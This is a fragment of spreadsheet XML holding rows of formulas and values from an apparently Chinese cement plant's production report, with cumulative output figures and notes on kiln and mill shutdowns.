        <f>'[11]24'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]24'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]24'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]24'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]24'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]24'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]24'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'23'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'23'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]24'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]24'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]24'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'23'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]24'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'23'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]24'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'23'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'23'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]24'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]24'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]24'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'23'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]24'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'23'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]24'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'23'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'23'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]24'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]24'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]24'!$R$34</f>
        <v>184.58</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'23'!U48</f>
        <v>1032.38</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>7058.91</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]24'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'23'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]24'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'23'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'23'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]24'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]24'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]24'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'23'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]24'!$V$8</f>
        <v>571.4072</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'23'!X49</f>
        <v>2830.3347</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>179360.6747</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]24'!$Y$8</f>
        <v>7763.29030000004</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'23'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'23'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]24'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]24'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]24'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'23'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]24'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'23'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]24'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]24'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]24'!$E$24</f>
        <v>5861</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'23'!H51</f>
        <v>98072.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1474471.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]24'!$I$24</f>
        <v>4834.242</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'23'!K51</f>
        <v>117048.977</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1480172.908</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]24'!$L$24</f>
        <v>29722.7069999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>66.0504599999996</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]24'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]24'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]24'!$R$30</f>
        <v>294.06</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'23'!U51</f>
        <v>4062.43</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>67060.901</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]24'!$V$30</f>
        <v>243</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'23'!X51</f>
        <v>4135.888</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>64752.125</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]24'!$Y$30</f>
        <v>3177.91600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]24'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]24'!$E$19</f>
        <v>4546.55000000002</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'23'!H52</f>
        <v>19899.2800000005</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1403466.53</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]24'!$I$19</f>
        <v>4779.33</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'23'!K52</f>
        <v>91728.81</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1373423.01</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]24'!$L$19</f>
        <v>33216.9130000507</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>22.9082158621039</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'[13]24'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]24'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'23'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]24'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'23'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]24'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]24'!$M$21+'[14]24'!$M$22+'[14]24'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]24'!$N$21+'[14]24'!$N$22+'[14]24'!$N$35</f>
        <v>0</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'23'!U53</f>
        <v>967.55</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>39301.977</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]24'!$Q$21+'[14]24'!$Q$22+'[14]24'!$Q$35</f>
        <v>25</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'23'!X53</f>
        <v>783</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40274</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]24'!$T$21+'[14]24'!$T$22+'[14]24'!$T$35</f>
        <v>1833.497</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]24'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'23'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]24'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'23'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]24'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]24'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]24'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]24'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'23'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]24'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'23'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]24'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]24'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'23'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]24'!$I$63</f>
        <v>246.33</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'23'!K55</f>
        <v>7077.925</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>42513.575</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]24'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]24'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]24'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]24'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]24'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]24'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]24'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]24'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]24'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'23'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'23'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]24'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：续停；2#磨：8:30-22:10避峰停机；3#磨：10:00-22:10避峰停机；4#磨：10:00-22:10避峰停机。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G57+'23'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'23'!K57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G58+'23'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'23'!K58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G59+'23'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'23'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]24'!$Q$65</f>
        <v>窑:错峰续停。A组磨：8:00-24:00避峰停机。D1#磨：正常，D2#磨：正常。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G60+'23'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'23'!K60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'[14]24'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]24'!$E$6</f>
        <v>6251</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'23'!H61</f>
        <v>91299</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1207172</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]24'!$E$21</f>
        <v>4799.24</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'23'!K61</f>
        <v>95298.46</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1196458.54</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]24'!$H$6</f>
        <v>33769.7099999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>64.9417499999998</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'[14]24'!$M$11+'[14]24'!$M$12+'[14]24'!$M$13+'[14]24'!$M$14+'[14]24'!$M$15+'[14]24'!$M$16+'[14]24'!$M$17+'[14]24'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]24'!$N$11+'[14]24'!$N$12+'[14]24'!$N$13+'[14]24'!$N$14+'[14]24'!$N$15+'[14]24'!$N$16+'[14]24'!$N$17+'[14]24'!$N$18</f>
        <v>603</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'23'!H62</f>
        <v>64119</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>900112.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]24'!$Q$11+'[14]24'!$Q$12+'[14]24'!$Q$13+'[14]24'!$Q$14+'[14]24'!$Q$15+'[14]24'!$Q$16+'[14]24'!$Q$17+'[14]24'!$Q$18</f>
        <v>4711</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'23'!K62</f>
        <v>65646</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>900118.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]24'!$T$11+'[14]24'!$T$12+'[14]24'!$T$13+'[14]24'!$T$14+'[14]24'!$T$15+'[14]24'!$T$16+'[14]24'!$T$17+'[14]24'!$T$18</f>
        <v>16927.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>67.7105359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]24'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]24'!$M$19+'[14]24'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]24'!$N$19+'[14]24'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'23'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]24'!$Q$19+'[14]24'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'23'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]24'!$T$19+'[14]24'!$T$20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G64+'23'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'23'!K64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G65+'23'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'23'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]24'!$Q$74</f>
        <v>1#窑:续停；2#窑:熟料质量波动减产；1#磨:0:00-24:00库满停机。2#磨:0:00-24:00库满停机。3#磨:20:55-24:00库满停机。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G66+'23'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'23'!K66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G67+'23'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'23'!K67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'[15]24'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]24'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'23'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]24'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'23'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]24'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]24'!$Q$77</f>
        <v>1#磨运行正常。2#磨运行正常。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]24'!$D$43+'[15]24'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]24'!$E$43+'[15]24'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'23'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]24'!$H$43+'[15]24'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'23'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]24'!$K$43+'[15]24'!$K$44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'[15]24'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]24'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'23'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]24'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'23'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]24'!$K$45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G71+'23'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'23'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
